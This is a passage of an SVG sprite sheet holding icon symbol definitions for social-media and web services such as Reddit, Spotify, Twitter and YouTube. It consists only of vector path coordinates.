c0.073-0.014,0.145-0.028,0.219-0.044c0.02-0.004,0.042-0.012,0.064-0.023c1.359-0.297,2.621-0.864,3.753-1.691l0.025-0.018 c0.04-0.029,0.08-0.058,0.119-0.089c2.192-1.664,3.609-4.049,3.898-6.778l0.069-1.2V4.814C22.026,4.605,22,4.398,21.927,4.194z M17.692,10.481l-4.704,4.512c-0.266,0.254-0.608,0.382-0.949,0.382c-0.342,0-0.684-0.128-0.949-0.382l-4.705-4.512 C5.838,9.957,5.82,9.089,6.344,8.542c0.524-0.547,1.392-0.565,1.939-0.04l3.756,3.601l3.755-3.601 c0.547-0.524,1.415-0.506,1.939,0.04C18.256,9.089,18.238,9.956,17.692,10.481z"/> </symbol> <symbol id="icon-reddit" viewBox="0 0 24 24"> <path d="M22,11.816c0-1.256-1.021-2.277-2.277-2.277c-0.593,0-1.122,0.24-1.526,0.614c-1.481-0.965-3.455-1.594-5.647-1.69 l1.171-3.702l3.18,0.748c0.008,1.028,0.846,1.862,1.876,1.862c1.035,0,1.877-0.842,1.877-1.878c0-1.035-0.842-1.877-1.877-1.877 c-0.769,0-1.431,0.466-1.72,1.13l-3.508-0.826c-0.203-0.047-0.399,0.067-0.46,0.261l-1.35,4.268 c-2.316,0.038-4.411,0.67-5.97,1.671C5.368,9.765,4.853,9.539,4.277,9.539C3.021,9.539,2,10.56,2,11.816 c0,0.814,0.433,1.523,1.078,1.925c-0.037,0.221-0.061,0.444-0.061,0.672c0,3.292,4.011,5.97,8.941,5.97s8.941-2.678,8.941-5.97 c0-0.214-0.02-0.424-0.053-0.632C21.533,13.39,22,12.661,22,11.816z M18.776,4.394c0.606,0,1.1,0.493,1.1,1.1s-0.493,1.1-1.1,1.1 s-1.1-0.494-1.1-1.1S18.169,4.394,18.776,4.394z M2.777,11.816c0-0.827,0.672-1.5,1.499-1.5c0.313,0,0.598,0.103,0.838,0.269 c-0.851,0.676-1.477,1.479-1.812,2.36C2.983,12.672,2.777,12.27,2.777,11.816z M11.959,19.606c-4.501,0-8.164-2.329-8.164-5.193 S7.457,9.22,11.959,9.22s8.164,2.329,8.164,5.193S16.46,19.606,11.959,19.606z M20.636,13.001c-0.326-0.89-0.948-1.701-1.797-2.384 c0.248-0.186,0.55-0.301,0.883-0.301c0.827,0,1.5,0.673,1.5,1.5C21.223,12.299,20.992,12.727,20.636,13.001z M8.996,14.704 c-0.76,0-1.397-0.616-1.397-1.376c0-0.76,0.637-1.397,1.397-1.397c0.76,0,1.376,0.637,1.376,1.397 C10.372,14.088,9.756,14.704,8.996,14.704z M16.401,13.328c0,0.76-0.616,1.376-1.376,1.376c-0.76,0-1.399-0.616-1.399-1.376 c0-0.76,0.639-1.397,1.399-1.397C15.785,11.931,16.401,12.568,16.401,13.328z M15.229,16.708c0.152,0.152,0.152,0.398,0,0.55 c-0.674,0.674-1.727,1.002-3.219,1.002c-0.004,0-0.007-0.002-0.011-0.002c-0.004,0-0.007,0.002-0.011,0.002 c-1.492,0-2.544-0.328-3.218-1.002c-0.152-0.152-0.152-0.398,0-0.55c0.152-0.152,0.399-0.151,0.55,0 c0.521,0.521,1.394,0.775,2.669,0.775c0.004,0,0.007,0.002,0.011,0.002c0.004,0,0.007-0.002,0.011-0.002 c1.275,0,2.148-0.253,2.669-0.775C14.831,16.556,15.078,16.556,15.229,16.708z"/> </symbol> <symbol id="icon-skype" viewBox="0 0 24 24"> <path d="M10.113,2.699c0.033-0.006,0.067-0.013,0.1-0.02c0.033,0.017,0.066,0.033,0.098,0.051L10.113,2.699z M2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223z M21.275,13.771 c0.007-0.035,0.011-0.071,0.018-0.106c-0.018-0.031-0.033-0.064-0.052-0.095L21.275,13.771z M13.563,21.199 c0.032,0.019,0.065,0.035,0.096,0.053c0.036-0.006,0.071-0.011,0.105-0.017L13.563,21.199z M22,16.386 c0,1.494-0.581,2.898-1.637,3.953c-1.056,1.057-2.459,1.637-3.953,1.637c-0.967,0-1.914-0.251-2.75-0.725 c0.036-0.006,0.071-0.011,0.105-0.017l-0.202-0.035c0.032,0.019,0.065,0.035,0.096,0.053c-0.543,0.096-1.099,0.147-1.654,0.147 c-1.275,0-2.512-0.25-3.676-0.743c-1.125-0.474-2.135-1.156-3.002-2.023c-0.867-0.867-1.548-1.877-2.023-3.002 c-0.493-1.164-0.743-2.401-0.743-3.676c0-0.546,0.049-1.093,0.142-1.628c0.018,0.032,0.033,0.064,0.051,0.095L2.72,10.223 c-0.006,0.034-0.011,0.069-0.017,0.103C2.244,9.5,2,8.566,2,7.615c0-1.493,0.582-2.898,1.637-3.953 c1.056-1.056,2.46-1.638,3.953-1.638c0.915,0,1.818,0.228,2.622,0.655c-0.033,0.007-0.067,0.013-0.1,0.02l0.199,0.031 c-0.032-0.018-0.066-0.034-0.098-0.051c0.002,0,0.003-0.001,0.004-0.001c0.586-0.112,1.187-0.169,1.788-0.169 c1.275,0,2.512,0.249,3.676,0.742c1.124,0.476,2.135,1.156,3.002,2.024c0.868,0.867,1.548,1.877,2.024,3.002 c0.493,1.164,0.743,2.401,0.743,3.676c0,0.575-0.054,1.15-0.157,1.712c-0.018-0.031-0.033-0.064-0.052-0.095l0.034,0.201 c0.007-0.035,0.011-0.071,0.018-0.106C21.754,14.494,22,15.432,22,16.386z M16.817,14.138c0-1.331-0.613-2.743-3.033-3.282 l-2.209-0.49c-0.84-0.192-1.807-0.444-1.807-1.237c0-0.794,0.679-1.348,1.903-1.348c2.468,0,2.243,1.696,3.468,1.696 c0.645,0,1.209-0.379,1.209-1.031c0-1.521-2.435-2.663-4.5-2.663c-2.242,0-4.63,0.952-4.63,3.488c0,1.221,0.436,2.521,2.839,3.123 l2.984,0.745c0.903,0.223,1.129,0.731,1.129,1.189c0,0.762-0.758,1.507-2.129,1.507c-2.679,0-2.307-2.062-3.743-2.062 c-0.645,0-1.113,0.444-1.113,1.078c0,1.236,1.501,2.886,4.856,2.886C15.236,17.737,16.817,16.199,16.817,14.138z"/> </symbol> <symbol id="icon-slideshare" viewBox="0 0 24 24"> <path d="M11.738,10.232a2.142,2.142,0,0,1-.721,1.619,2.556,2.556,0,0,1-3.464,0,2.183,2.183,0,0,1,0-3.243,2.572,2.572,0,0,1,3.464,0A2.136,2.136,0,0,1,11.738,10.232Zm5.7,0a2.15,2.15,0,0,1-.715,1.619,2.563,2.563,0,0,1-3.469,0,2.183,2.183,0,0,1,0-3.243,2.58,2.58,0,0,1,3.469,0A2.144,2.144,0,0,1,17.439,10.232Zm2.555,2.045V4.7a2.128,2.128,0,0,0-.363-1.4,1.614,1.614,0,0,0-1.261-.415H5.742a1.656,1.656,0,0,0-1.278.386A2.246,2.246,0,0,0,4.129,4.7v7.643a8.212,8.212,0,0,0,1,.454q.516.193.92.318a6.847,6.847,0,0,0,.92.21q.516.085.806.125a6.615,6.615,0,0,0,.795.045l.665.006q.16,0,.642-.023t.506-.023a1.438,1.438,0,0,1,1.079.307,1.134,1.134,0,0,0,.114.1,7.215,7.215,0,0,0,.693.579q.079-1.033,1.34-.988.057,0,.415.017l.488.023q.13.006.517.011t.6-.011l.619-.051a5.419,5.419,0,0,0,.693-.1l.7-.153a5.353,5.353,0,0,0,.761-.221q.345-.131.766-.307a8.727,8.727,0,0,0,.818-.392Zm1.851-.057a10.4,10.4,0,0,1-4.225,2.862,6.5,6.5,0,0,1-.261,5.281,3.524,3.524,0,0,1-2.078,1.681,2.452,2.452,0,0,1-2.067-.17,1.915,1.915,0,0,1-.931-1.863l-.011-3.7V16.3l-.279-.068q-.188-.045-.267-.057l-.011,3.839a1.9,1.9,0,0,1-.943,1.863,2.481,2.481,0,0,1-2.078.17,3.519,3.519,0,0,1-2.067-1.7,6.546,6.546,0,0,1-.25-5.258A10.4,10.4,0,0,1,2.152,12.22a.56.56,0,0,1-.045-.715q.238-.3.681.011l.125.079a.767.767,0,0,1,.125.091V3.8a1.987,1.987,0,0,1,.534-1.4,1.7,1.7,0,0,1,1.295-.579H19.141a1.7,1.7,0,0,1,1.295.579,1.985,1.985,0,0,1,.534,1.4v7.882l.238-.17q.443-.307.681-.011a.56.56,0,0,1-.045.715Z"/> </symbol> <symbol id="icon-snapchat" viewBox="0 0 24 24"> <path d="M12.065,2a5.526,5.526,0,0,1,3.132.892A5.854,5.854,0,0,1,17.326,5.4a5.821,5.821,0,0,1,.351,2.33q0,.612-.117,2.487a.809.809,0,0,0,.365.091,1.93,1.93,0,0,0,.664-.176,1.93,1.93,0,0,1,.664-.176,1.3,1.3,0,0,1,.729.234.7.7,0,0,1,.351.6.839.839,0,0,1-.41.7,2.732,2.732,0,0,1-.9.41,3.192,3.192,0,0,0-.9.378.728.728,0,0,0-.41.618,1.575,1.575,0,0,0,.156.56,6.9,6.9,0,0,0,1.334,1.953,5.6,5.6,0,0,0,1.881,1.315,5.875,5.875,0,0,0,1.042.3.42.42,0,0,1,.365.456q0,.911-2.852,1.341a1.379,1.379,0,0,0-.143.507,1.8,1.8,0,0,1-.182.605.451.451,0,0,1-.429.241,5.878,5.878,0,0,1-.807-.085,5.917,5.917,0,0,0-.833-.085,4.217,4.217,0,0,0-.807.065,2.42,2.42,0,0,0-.82.293,6.682,6.682,0,0,0-.755.5q-.351.267-.755.527a3.886,3.886,0,0,1-.989.436A4.471,4.471,0,0,1,11.831,22a4.307,4.307,0,0,1-1.256-.176,3.784,3.784,0,0,1-.976-.436q-.4-.26-.749-.527a6.682,6.682,0,0,0-.755-.5,2.422,2.422,0,0,0-.807-.293,4.432,4.432,0,0,0-.82-.065,5.089,5.089,0,0,0-.853.1,5,5,0,0,1-.762.1.474.474,0,0,1-.456-.241,1.819,1.819,0,0,1-.182-.618,1.411,1.411,0,0,0-.143-.521q-2.852-.429-2.852-1.341a.42.42,0,0,1,.365-.456,5.793,5.793,0,0,0,1.042-.3,5.524,5.524,0,0,0,1.881-1.315,6.789,6.789,0,0,0,1.334-1.953A1.575,1.575,0,0,0,6,12.9a.728.728,0,0,0-.41-.618,3.323,3.323,0,0,0-.9-.384,2.912,2.912,0,0,1-.9-.41.814.814,0,0,1-.41-.684.71.71,0,0,1,.338-.593,1.208,1.208,0,0,1,.716-.241,1.976,1.976,0,0,1,.625.169,2.008,2.008,0,0,0,.69.169.919.919,0,0,0,.416-.091q-.117-1.849-.117-2.474A5.861,5.861,0,0,1,6.385,5.4,5.516,5.516,0,0,1,8.625,2.819,7.075,7.075,0,0,1,12.062,2Z"/> </symbol> <symbol id="icon-soundcloud" viewBox="0 0 24 24"> <path d="M8.9,16.1L9,14L8.9,9.5c0-0.1,0-0.1-0.1-0.1c0,0-0.1-0.1-0.1-0.1c-0.1,0-0.1,0-0.1,0.1c0,0-0.1,0.1-0.1,0.1L8.3,14l0.1,2.1 c0,0.1,0,0.1,0.1,0.1c0,0,0.1,0.1,0.1,0.1C8.8,16.3,8.9,16.3,8.9,16.1z M11.4,15.9l0.1-1.8L11.4,9c0-0.1,0-0.2-0.1-0.2 c0,0-0.1,0-0.1,0s-0.1,0-0.1,0c-0.1,0-0.1,0.1-0.1,0.2l0,0.1l-0.1,5c0,0,0,0.7,0.1,2v0c0,0.1,0,0.1,0.1,0.1c0.1,0.1,0.1,0.1,0.2,0.1 c0.1,0,0.1,0,0.2-0.1c0.1,0,0.1-0.1,0.1-0.2L11.4,15.9z M2.4,12.9L2.5,14l-0.2,1.1c0,0.1,0,0.1-0.1,0.1c0,0-0.1,0-0.1-0.1L2.1,14 l0.1-1.1C2.2,12.9,2.3,12.9,2.4,12.9C2.3,12.9,2.4,12.9,2.4,12.9z M3.1,12.2L3.3,14l-0.2,1.8c0,0.1,0,0.1-0.1,0.1 c-0.1,0-0.1,0-0.1-0.1L2.8,14L3,12.2C3,12.2,3,12.2,3.1,12.2C3.1,12.2,3.1,12.2,3.1,12.2z M3.9,11.9L4.1,14l-0.2,2.1 c0,0.1,0,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L3.5,14l0.2-2.1c0-0.1,0-0.1,0.1-0.1C3.9,11.8,3.9,11.8,3.9,11.9z M4.7,11.9L4.9,14 l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c-0.1,0-0.1,0-0.1-0.1L4.3,14l0.2-2.2c0-0.1,0-0.1,0.1-0.1C4.7,11.7,4.7,11.8,4.7,11.9z M5.6,12 l0.2,2l-0.2,2.1c0,0.1-0.1,0.1-0.1,0.1c0,0-0.1,0-0.1,0c0,0,0-0.1,0-0.1L5.1,14l0.2-2c0,0,0-0.1,0-0.1s0.1,0,0.1,0 C5.5,11.9,5.5,11.9,5.6,12L5.6,12z M6.4,10.7L6.6,14l-0.2,2.1c0,0,0,0.1,0,0.1c0,0-0.1,0-0.1,0c-0.1,0-0.1-0.1-0.2-0.2L5.9,14 l0.2-3.3c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0C6.4,10.7,6.4,10.7,6.4,10.7z M7.2,10l0.2,4.1l-0.2,2.1c0,0,0,0.1,0,0.1 c0,0-0.1,0-0.1,0c-0.1,0-0.2-0.1-0.2-0.2l-0.1-2.1L6.8,10c0-0.1,0.1-0.2,0.2-0.2c0,0,0.1,0,0.1,0S7.2,9.9,7.2,10z M8,9.6L8.2,14 L8,16.1c0,0.1-0.1,0.2-0.2,0.2c-0.1,0-0.2-0.1-0.2-0.2L7.5,14l0.1-4.4c0-0.1,0-0.1,0.1-0.1c0,0,0.1-0.1,0.1-0.1c0.1,0,0.1,0,0.1,0.1 C8,9.6,8,9.6,8,9.6z M11.4,16.1L11.4,16.1L11.4,16.1z M9.7,9.6L9.8,14l-0.1,2.1c0,0.1,0,0.1-0.1,0.2s-0.1,0.1-0.2,0.1 c-0.1,0-0.1,0-0.1-0.1s-0.1-0.1-0.1-0.2L9.2,14l0.1-4.4c0-0.1,0-0.1,0.1-0.2s0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S9.7,9.5,9.7,9.6 L9.7,9.6z M10.6,9.8l0.1,4.3l-0.1,2c0,0.1,0,0.1-0.1,0.2c0,0-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c0,0-0.1-0.1-0.1-0.2L10,14 l0.1-4.3c0-0.1,0-0.1,0.1-0.2c0,0,0.1-0.1,0.2-0.1c0.1,0,0.1,0,0.2,0.1S10.6,9.7,10.6,9.8z M12.4,14l-0.1,2c0,0.1,0,0.1-0.1,0.2 c-0.1,0.1-0.1,0.1-0.2,0.1c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2l-0.1-1l-0.1-1l0.1-5.5v0c0-0.1,0-0.2,0.1-0.2 c0.1,0,0.1-0.1,0.2-0.1c0,0,0.1,0,0.1,0c0.1,0,0.1,0.1,0.1,0.2L12.4,14z M22.1,13.9c0,0.7-0.2,1.3-0.7,1.7c-0.5,0.5-1.1,0.7-1.7,0.7 h-6.8c-0.1,0-0.1,0-0.2-0.1c-0.1-0.1-0.1-0.1-0.1-0.2V8.2c0-0.1,0.1-0.2,0.2-0.3c0.5-0.2,1-0.3,1.6-0.3c1.1,0,2.1,0.4,2.9,1.1 c0.8,0.8,1.3,1.7,1.4,2.8c0.3-0.1,0.6-0.2,1-0.2c0.7,0,1.3,0.2,1.7,0.7C21.8,12.6,22.1,13.2,22.1,13.9L22.1,13.9z"/> </symbol> <symbol id="icon-spotify" viewBox="0 0 24 24"> <path d="M12,2C6.477,2,2,6.477,2,12c0,5.523,4.477,10,10,10c5.523,0,10-4.477,10-10C22,6.477,17.523,2,12,2 M16.586,16.424 c-0.18,0.295-0.563,0.387-0.857,0.207c-2.348-1.435-5.304-1.76-8.785-0.964c-0.335,0.077-0.67-0.133-0.746-0.469 c-0.077-0.335,0.132-0.67,0.469-0.746c3.809-0.871,7.077-0.496,9.713,1.115C16.673,15.746,16.766,16.13,16.586,16.424 M17.81,13.7 c-0.226,0.367-0.706,0.482-1.072,0.257c-2.687-1.652-6.785-2.131-9.965-1.166C6.36,12.917,5.925,12.684,5.8,12.273 C5.675,11.86,5.908,11.425,6.32,11.3c3.632-1.102,8.147-0.568,11.234,1.328C17.92,12.854,18.035,13.335,17.81,13.7 M17.915,10.865 c-3.223-1.914-8.54-2.09-11.618-1.156C5.804,9.859,5.281,9.58,5.131,9.086C4.982,8.591,5.26,8.069,5.755,7.919 c3.532-1.072,9.404-0.865,13.115,1.338c0.445,0.264,0.59,0.838,0.327,1.282C18.933,10.983,18.359,11.129,17.915,10.865"/> </symbol> <symbol id="icon-stackoverflow" viewBox="0 0 24 24"> <path d="m 17.817128,20.228605 v -5.337217 h 1.771431 V 22 H 3.6 v -7.108612 h 1.771401 v 5.337217 z" /> <path d="m 7.3267845,14.385359 8.6959295,1.817316 0.368168,-1.748385 -8.6959318,-1.817319 z m 1.1503197,-4.140944 8.0517968,3.749872 0.73617,-1.610385 -8.0518344,-3.7728517 z m 2.2315078,-3.9569154 6.832405,5.6822664 1.12738,-1.357316 -6.832576,-5.6822636 z m 4.417,-4.2099019 -1.426448,1.0581864 5.291191,7.1316119 1.426412,-1.0582745 z M 7.1427296,18.434189 h 8.8799844 v -1.7713 H 7.1427296 Z" /> <path d="m 17.817128,20.228605 v -5.337217 h 1.771431 V 22 H 3.6 v -7.108612 h 1.771401 v 5.337217 z" /> <path d="m 7.3267845,14.385359 8.6959295,1.817316 0.368168,-1.748385 -8.6959318,-1.817319 z m 1.1503197,-4.140944 8.0517968,3.749872 0.73617,-1.610385 -8.0518344,-3.7728517 z m 2.2315078,-3.9569154 6.832405,5.6822664 1.12738,-1.357316 -6.832576,-5.6822636 z m 4.417,-4.2099019 -1.426448,1.0581864 5.291191,7.1316119 1.426412,-1.0582745 z M 7.1427296,18.434189 h 8.8799844 v -1.7713 H 7.1427296 Z" /> </symbol> <symbol id="icon-stumbleupon" viewBox="0 0 24 24"> <path d="M12,4.294c-2.469,0-4.471,2.002-4.471,4.471v6.353c0,0.585-0.474,1.059-1.059,1.059c-0.585,0-1.059-0.474-1.059-1.059 v-2.824H2v2.941c0,2.469,2.002,4.471,4.471,4.471c2.469,0,4.471-2.002,4.471-4.471V8.765c0-0.585,0.474-1.059,1.059-1.059 s1.059,0.474,1.059,1.059v1.294l1.412,0.647l2-0.647V8.765C16.471,6.296,14.469,4.294,12,4.294z M13.059,12.353v2.882 c0,2.469,2.002,4.471,4.471,4.471S22,17.704,22,15.235v-2.824h-3.412v2.824c0,0.585-0.474,1.059-1.059,1.059 c-0.585,0-1.059-0.474-1.059-1.059v-2.882l-2,0.647L13.059,12.353z"/> </symbol> <symbol id="icon-tumblr" viewBox="0 0 24 24"> <path d="M16.749,17.396c-0.357,0.17-1.041,0.319-1.551,0.332c-1.539,0.041-1.837-1.081-1.85-1.896V9.847h3.861V6.937h-3.847V2.039 c0,0-2.77,0-2.817,0c-0.046,0-0.127,0.041-0.138,0.144c-0.165,1.499-0.867,4.13-3.783,5.181v2.484h1.945v6.282 c0,2.151,1.587,5.206,5.775,5.135c1.413-0.024,2.982-0.616,3.329-1.126L16.749,17.396z"/> </symbol> <symbol id="icon-twitch" viewBox="0 0 24 24"> <path d="M16.499,8.089h-1.636v4.91h1.636V8.089z M12,8.089h-1.637v4.91H12V8.089z M4.228,3.178L3,6.451v13.092h4.499V22h2.456 l2.454-2.456h3.681L21,14.636V3.178H4.228z M19.364,13.816l-2.864,2.865H12l-2.453,2.453V16.68H5.863V4.814h13.501V13.816z"/> </symbol> <symbol id="icon-twitter" viewBox="0 0 24 24"> <path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1.843,6.29,1.843 c7.547,0,11.675-6.252,11.675-11.675c0-0.178-0.004-0.355-0.012-0.531C20.985,7.47,21.68,6.747,22.23,5.924z"/> </symbol> <symbol id="icon-vimeo" viewBox="0 0 24 24"> <path d="M22.396,7.164c-0.093,2.026-1.507,4.799-4.245,8.32C15.322,19.161,12.928,21,10.97,21c-1.214,0-2.24-1.119-3.079-3.359 c-0.56-2.053-1.119-4.106-1.68-6.159C5.588,9.243,4.921,8.122,4.206,8.122c-0.156,0-0.701,0.328-1.634,0.98L1.594,7.841 c1.027-0.902,2.04-1.805,3.037-2.708C6.001,3.95,7.03,3.327,7.715,3.264c1.619-0.156,2.616,0.951,2.99,3.321 c0.404,2.557,0.685,4.147,0.841,4.769c0.467,2.121,0.981,3.181,1.542,3.181c0.435,0,1.09-0.688,1.963-2.065 c0.871-1.376,1.338-2.422,1.401-3.142c0.125-1.187-0.343-1.782-1.401-1.782c-0.498,0-1.012,0.115-1.541,0.341 c1.023-3.35,2.977-4.977,5.862-4.884C21.511,3.066,22.52,4.453,22.396,7.164z"/> </symbol> <symbol id="icon-vk" viewBox="0 0 24 24"> <path d="M22,7.1c0.2,0.4-0.4,1.5-1.6,3.1c-0.2,0.2-0.4,0.5-0.7,0.9c-0.5,0.7-0.9,1.1-0.9,1.4c-0.1,0.3-0.1,0.6,0.1,0.8 c0.1,0.1,0.4,0.4,0.8,0.9h0l0,0c1,0.9,1.6,1.7,2,2.3c0,0,0,0.1,0.1,0.1c0,0.1,0,0.1,0.1,0.3c0,0.1,0,0.2,0,0.4 c0,0.1-0.1,0.2-0.3,0.3c-0.1,0.1-0.4,0.1-0.6,0.1l-2.7,0c-0.2,0-0.4,0-0.6-0.1c-0.2-0.1-0.4-0.1-0.5-0.2l-0.2-0.1 c-0.2-0.1-0.5-0.4-0.7-0.7s-0.5-0.6-0.7-0.8c-0.2-0.2-0.4-0.4-0.6-0.6C14.8,15,14.6,15,14.4,15c0,0,0,0-0.1,0c0,0-0.1,0.1-0.2,0.2 c-0.1,0.1-0.2,0.2-0.2,0.3c-0.1,0.1-0.1,0.3-0.2,0.5c-0.1,0.2-0.1,0.5-0.1,0.8c0,0.1,0,0.2,0,0.3c0,0.1-0.1,0.2-0.1,0.2l0,0.1 c-0.1,0.1-0.3,0.2-0.6,0.2h-1.2c-0.5,0-1,0-1.5-0.2c-0.5-0.1-1-0.3-1.4-0.6s-0.7-0.5-1.1-0.7s-0.6-0.4-0.7-0.6l-0.3-0.3 c-0.1-0.1-0.2-0.2-0.3-0.3s-0.4-0.5-0.7-0.9s-0.7-1-1.1-1.6c-0.4-0.6-0.8-1.3-1.3-2.2C2.9,9.4,2.5,8.5,2.1,7.5C2,7.4,2,7.3,2,7.2 c0-0.1,0-0.1,0-0.2l0-0.1c0.1-0.1,0.3-0.2,0.6-0.2l2.9,0c0.1,0,0.2,0,0.2,0.1S5.9,6.9,5.9,7L6,7c0.1,0.1,0.2,0.2,0.3,0.3 C6.4,7.7,6.5,8,6.7,8.4C6.9,8.8,7,9,7.1,9.2l0.2,0.3c0.2,0.4,0.4,0.8,0.6,1.1c0.2,0.3,0.4,0.5,0.5,0.7s0.3,0.3,0.4,0.4 c0.1,0.1,0.3,0.1,0.4,0.1c0.1,0,0.2,0,0.3-0.1c0,0,0,0,0.1-0.1c0,0,0.1-0.1,0.1-0.2c0.1-0.1,0.1-0.3,0.1-0.5c0-0.2,0.1-0.5,0.1-0.8 c0-0.4,0-0.8,0-1.3c0-0.3,0-0.5-0.1-0.8c0-0.2-0.1-0.4-0.1-0.5L9.6,7.6C9.4,7.3,9.1,7.2,8.7,7.1C8.6,7.1,8.6,7,8.7,6.9 C8.9,6.7,9,6.6,9.1,6.5c0.4-0.2,1.2-0.3,2.5-0.3c0.6,0,1,0.1,1.4,0.1c0.1,0,0.3,0.1,0.3,0.1c0.1,0.1,0.2,0.1,0.2,0.3 c0,0.1,0.1,0.2,0.1,0.3s0,0.3,0,0.5c0,0.2,0,0.4,0,0.6c0,0.2,0,0.4,0,0.7c0,0.3,0,0.6,0,0.9c0,0.1,0,0.2,0,0.4c0,0.2,0,0.4,0,0.5 c0,0.1,0,0.3,0,0.4s0.1,0.3,0.1,0.4c0.1,0.1,0.1,0.2,0.2,0.3c0.1,0,0.1,0,0.2,0c0.1,0,0.2,0,0.3-0.1c0.1-0.1,0.2-0.2,0.4-0.4 s0.3-0.4,0.5-0.7c0.2-0.3,0.5-0.7,0.7-1.1c0.4-0.7,0.8-1.5,1.1-2.3c0-0.1,0.1-0.1,0.1-0.2c0-0.1,0.1-0.1,0.1-0.1l0,0l0.1,0 c0,0,0,0,0.1,0s0.2,0,0.2,0l3,0c0.3,0,0.5,0,0.7,0S21.9,7,21.9,7L22,7.1z"/> </symbol> <symbol id="icon-wordpress" viewBox="0 0 24 24"> <path d="M12.158,12.786L9.46,20.625c0.806,0.237,1.657,0.366,2.54,0.366c1.047,0,2.051-0.181,2.986-0.51 c-0.024-0.038-0.046-0.079-0.065-0.124L12.158,12.786z M3.009,12c0,3.559,2.068,6.634,5.067,8.092L3.788,8.341 C3.289,9.459,3.009,10.696,3.009,12z M18.069,11.546c0-1.112-0.399-1.881-0.741-2.48c-0.456-0.741-0.883-1.368-0.883-2.109 c0-0.826,0.627-1.596,1.51-1.596c0.04,0,0.078,0.005,0.116,0.007C16.472,3.904,14.34,3.009,12,3.009 c-3.141,0-5.904,1.612-7.512,4.052c0.211,0.007,0.41,0.011,0.579,0.011c0.94,0,2.396-0.114,2.396-0.114 C7.947,6.93,8.004,7.642,7.52,7.699c0,0-0.487,0.057-1.029,0.085l3.274,9.739l1.968-5.901l-1.401-3.838 C9.848,7.756,9.389,7.699,9.389,7.699C8.904,7.67,8.961,6.93,9.446,6.958c0,0,1.484,0.114,2.368,0.114 c0.94,0,2.397-0.114,2.397-0.114c0.485-0.028,0.542,0.684,0.057,0.741c0,0-0.488,0.057-1.029,0.085l3.249,9.665l0.897-2.996 C17.841,13.284,18.069,12.316,18.069,11.546z M19.889,7.686c0.039,0.286,0.06,0.593,0.06,0.924c0,0.912-0.171,1.938-0.684,3.22 l-2.746,7.94c2.673-1.558,4.47-4.454,4.47-7.771C20.991,10.436,20.591,8.967,19.889,7.686z M12,22C6.486,22,2,17.514,2,12 C2,6.486,6.486,2,12,2c5.514,0,10,4.486,10,10C22,17.514,17.514,22,12,22z"/> </symbol> <symbol id="icon-yelp" viewBox="0 0 24 24"> <path d="M12.271,16.718v1.417q-.011,3.257-.067,3.4a.707.707,0,0,1-.569.446,4.637,4.637,0,0,1-2.024-.424A4.609,4.609,0,0,1,7.8,20.565a.844.844,0,0,1-.19-.4.692.692,0,0,1,.044-.29,3.181,3.181,0,0,1,.379-.524q.335-.412,2.019-2.409.011,0,.669-.781a.757.757,0,0,1,.44-.274.965.965,0,0,1,.552.039.945.945,0,0,1,.418.324.732.732,0,0,1,.139.468Zm-1.662-2.8a.783.783,0,0,1-.58.781l-1.339.435q-3.067.981-3.257.981a.711.711,0,0,1-.6-.4,2.636,2.636,0,0,1-.19-.836,9.134,9.134,0,0,1,.011-1.857,3.559,3.559,0,0,1,.335-1.389.659.659,0,0,1,.625-.357,22.629,22.629,0,0,1,2.253.859q.781.324,1.283.524l.937.379a.771.771,0,0,1,.4.34A.982.982,0,0,1,10.609,13.917Zm9.213,3.313a4.467,4.467,0,0,1-1.021,1.8,4.559,4.559,0,0,1-1.512,1.417.671.671,0,0,1-.7-.078q-.156-.112-2.052-3.2l-.524-.859a.761.761,0,0,1-.128-.513.957.957,0,0,1,.217-.513.774.774,0,0,1,.926-.29q.011.011,1.327.446,2.264.736,2.7.887a2.082,2.082,0,0,1,.524.229.673.673,0,0,1,.245.68Zm-7.5-7.049q.056,1.137-.6,1.361-.647.19-1.272-.792L6.237,4.08a.7.7,0,0,1,.212-.691,5.788,5.788,0,0,1,2.314-1,5.928,5.928,0,0,1,2.5-.352.681.681,0,0,1,.547.5q.034.2.245,3.407T12.327,10.181Zm7.384,1.2a.679.679,0,0,1-.29.658q-.167.112-3.67.959-.747.167-1.015.257l.011-.022a.769.769,0,0,1-.513-.044.914.914,0,0,1-.413-.357.786.786,0,0,1,0-.971q.011-.011.836-1.137,1.394-1.908,1.673-2.275a2.423,2.423,0,0,1,.379-.435A.7.7,0,0,1,17.435,8a4.482,4.482,0,0,1,1.372,1.489,4.81,4.81,0,0,1,.9,1.868v.034Z"/> </symbol> <symbol id="icon-youtube" viewBox="0 0 24 24"> <path d="M21.8,8.001c0,0-0.195-1.378-0.795-1.985c-0.76-0.797-1.613-0.801-2.004-0.847c-2.799-0.202-6.997-0.202-6.997-0.202 h-0.009c0,0-4.198,0-6.997,0.202C4.608,5.216,3.756,5.22,2.995,6.016C2.395,6.623,2.2,8.001,2.2,8.001S2,9.62,2,11.238v1.517 c0,1.618,0.2,3.237,0.2,3.237s0.195,1.378,0.795,1.985c0.761,0.797,1.76,0.771,2.205,0.855c1.6,0.153,6.8,0.201,6.8,0.201 s4.203-0.006,7.001-0.209c0.391-0.047,1.243-0.051,2.004-0.847c0.6-0.607,0.795-1.985,0.795-1.985s0.2-1.618,0.2-3.237v-1.517 C22,9.62,21.8,8.001,21.8,8.001z M9.935,14.594l-0.001-5.62l5.404,2.82L9.935,14.594z"/> </symbol> </defs> 